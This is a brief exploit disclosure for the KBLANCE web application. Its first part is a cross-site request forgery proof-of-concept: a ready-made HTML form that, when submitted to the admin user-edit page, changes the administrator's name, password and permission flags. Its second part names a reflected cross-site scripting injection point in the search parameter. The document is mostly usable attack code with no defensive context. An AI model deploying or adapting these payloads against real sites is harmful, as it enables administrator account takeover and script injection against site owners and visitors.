KBLANCE | Xsrf
-----------------------------------------------------------------------------------------------------------
author : CWH1RLPOOL |Bug Researchers
-----------------------------------------------------------------------------------------------------------
info:Admin Bilgileri Degistirilebilir.
-----------------------------------------------------------------------------------------------------------
<form name=asdf method=post action=http://www.site.com/[path]/admin/users/edit2.php onSubmit=return check();>
<input type=hidden name=uid value=2>
<input name=uname id=uname type=text value=admin size= style=width:250px; >
<input name=pwd type=password id=pwd style=width:250px; value=>
<input name=cpwd type=password id=cpwd style=width:250px; value=>
<input name=fname type=text id=fname style=width:250px; value=admin>
<input name=lname type=text id=lname style=width:250px; value=Shan>
<input name=email type=text id=email style=width:250px; value=[email protected]>
<input type=checkbox name=a1 id=a1 value=1>
<input type=checkbox name=a2 id=a2 value=1>
<input type=checkbox name=a3 id=a3 value=1>
<input type=checkbox name=a4 id=a4 value=1>
<input type=checkbox name=a5 id=a5 value=1>
<input type=checkbox name=a6 id=a6 value=1>
<input type=checkbox name=a7 id=a7 value=1>
<input type=checkbox name=a8 id=a8 value=1>
<input type=checkbox name=a9 id=a9 value=1>
<input type=checkbox name=a10 id=a10 value=1>
<input type=checkbox name=a11 id=a11 value=1>
<input type=checkbox name=a12 id=a12 value=1>
<input type=checkbox name=a13 id=a13 value=1>
<input type=checkbox name=a14 id=a14 value=1>
<input type=checkbox name=a15 id=a15 value=1>
<input type=checkbox name=a16 id=a16 value=1>
<input type=checkbox name=a17 id=a17 value=1>
<input type=checkbox name=a18 id=a18 value=1>
<input type=checkbox name=a19 id=a19 value=1>
<input type=checkbox name=a20 id=a20 value=1>
<input type=checkbox name=a21 id=a21 value=1>
<input type=checkbox name=a22 id=a22 value=1>
<input type=checkbox name=a23 id=a23 value=1>
<input type=submit name=submit value=Save>
<input type=button name=go value=Cancel onClick=window.open(’index.php?main=users&sub=index’,’_self’);>
</form>
------------------------------------------------------------------------------------------------------------
KBLANCE | Cross Site Scripting Bug

http://www.site/[path]/index.php?main=search&sub=index&view=window&SearchWd=[Xsscode]
-------------------------------------------------------------------------------------